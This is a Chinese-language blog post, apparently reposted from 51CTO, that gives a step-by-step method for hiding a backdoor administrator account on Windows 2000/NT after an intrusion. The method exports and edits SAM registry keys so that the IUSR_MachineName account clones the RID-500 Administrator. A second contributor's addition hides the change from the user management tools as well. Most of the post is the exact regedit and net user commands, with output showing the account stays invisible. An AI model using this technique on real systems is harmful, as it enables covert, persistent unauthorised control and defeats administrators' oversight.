經常看到一些人在入侵一台Windows 2000或者Windows NT後堂而皇之地建立一個管理者組的使用者,似乎當管理者不存在一般,今天偶違背一下偶以前的初衷,Share一個類似于RootKit的玩藝,當然,這些過程也是可以用腳本實作的,但是我就不寫了,OK,Show Time Now。
首先要讓大家知道的概念是在Windows 2000和Windows NT裡,預設管理者帳号的SID是固定的500(0x1f4),那麼我們可以用機器裡已經存在的一個帳号将SID為500的帳号進行克隆,在這裡我們選擇的帳号是IUSR_MachineName(當然,為了加強隐蔽性,我們選擇了這個帳号,所有使用者都可以用以下的方法,隻不過這個使用者較常見罷了),測試環境為Windows 2000 Server。
運作一個System的CMD Shell( [url]http://www.sometips.com/tips/scripts/173.htm[/url] 或使用 [url]Http://www.sometips.com/soft/psu.exe[/url]),然後在該CMD Shell裡面運作
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
這樣我們将SID 為500的管理者帳号的相關資訊導出,然後編輯adam.reg檔案,将adam.reg檔案的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的'1F4'修改為IUSR_MachineName的SID(大部分的機器該使用者的SID都為0x3E9,如果機器在最初安裝的時候沒有安裝IIS,而自己建立了帳号後再安裝IIS就有可能不是這個值),将Root.reg檔案中的'1F4'修改為'3E9'後執行
regedit /s adam.reg
導入該Reg檔案
然後運作
net user IUSR_MachineName Sometips
修改IUSR_MachineName的密碼(最好使用14位的密碼,越像IUSR_MachineName的密碼越好)
OK,大功告成...
這樣,我們擁有和預設管理者一樣的桌面、一樣的Profile.....
而且,當我們運作 net localgroup administrators 時,看看結果:
C:\>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
再看看USER2SID的輸出結果:
C:\>user2sid Administrator
S-1-5-21-1004336348-1078145449-854245398-500
Number of subauthorities is 5
Domain is IDONTKNOW
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
C:\>user2sid iusr_machinename
S-1-5-21-1004336348-1078145449-854245398-1001
我想,再高明的管理者也看不到任何的異狀了...而且,随便管理者改成什麼密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理者喜歡經常修改IUSR_MachineName為其他的名字吧)
^_^,這算不算RootKit...
附:
1、感謝叮叮付出需要reinstall OS的代價...
2、任何用以上方法進行試驗所導緻的系統無法使用均與偶無關,偶均不提供技術支援...
-----------------------------------------------------------------------------
叮叮 的補充完善
很多人提到使用了管理工具的使用者管理後,能夠發現IUSR_MachineName被提升了權限。
現給出解決辦法。
方法同上,不過這次修改内容多一些。即
這次要導出兩個key内容:
一個是adam提到的
然後另外一個是你需要修改那個賬号的值
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
然後按照adam提到的修改adam.reg
“将adam.reg檔案的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最後的'1F4'修改為IUSR_MachineName的SID”
現在,你還要從iusr.reg檔案中複制一下内容
就是将iusr.reg檔案中“'V'=hex:0”開始一直到iusr.reg檔案結束部分複制下來
然後替換掉adam.reg中同樣位置的部分
最後使用
呵呵,别忘了給這個IUSR_MachineName改密碼哦。
hehe,ok,大功告成。
現在IUSR_MachineName賬号擁有了管理者的權限,但是你使用net.exe和
管理工具中的使用者管理都将看不到任何痕迹,即使你去察看所屬于的組和使用者。
都和修改前沒有任何差別。
好了,補充結束。
本文轉自loveme2351CTO部落格,原文連結:http://blog.51cto.com/loveme23/8541 ,如需轉載請自行聯系原作者